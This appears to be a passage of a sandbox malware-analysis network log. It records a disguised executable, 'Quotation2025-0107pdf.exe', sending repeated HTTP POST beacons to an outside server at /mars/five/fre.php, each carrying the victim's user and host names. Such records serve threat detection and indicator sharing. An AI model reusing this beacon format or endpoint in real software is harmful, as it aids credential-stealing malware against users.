Jan 7, 2025 12:33:19.383115053 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49985	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:19.532592058 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:19.538604021 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:20.261940002 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49991	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:20.410084963 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:20.414906025 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:21.160782099 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49997	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:21.325269938 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:21.330904961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:22.097130060 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50003	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:22.249197006 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:22.254057884 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:22.988300085 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50010	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:23.156584024 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:23.161672115 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:23.905446053 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50019	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:24.047564983 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:24.052351952 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:24.784308910 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50026	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:24.964627981 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:24.970591068 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:25.726171970 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50032	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:25.880321026 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:25.885204077 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:26.611114979 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50038	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:26.766432047 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:26.771342993 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:27.494731903 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50045	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:27.673785925 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:27.680963993 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:28.405051947 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50054	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:28.559421062 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:28.568840027 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:29.321559906 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50060	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:29.469875097 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:29.482590914 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:30.200114965 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50067	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:30.413436890 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:30.418199062 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:31.133711100 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50073	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:31.278424025 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:31.283217907 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:32.021081924 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50079	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:32.178493023 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:32.183439016 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:32.920279026 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50086	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:33.059987068 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:33.064765930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:33.838028908 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50094	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:33.988398075 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:33.993233919 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:34.750180006 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50100	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:34.889396906 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:34.894253969 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:35.663187027 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50106	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:35.810368061 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:35.815202951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:36.542372942 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50112	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:36.698333025 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:36.704613924 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:37.462203979 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50114	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:37.612569094 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:37.618567944 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:38.350887060 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50115	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
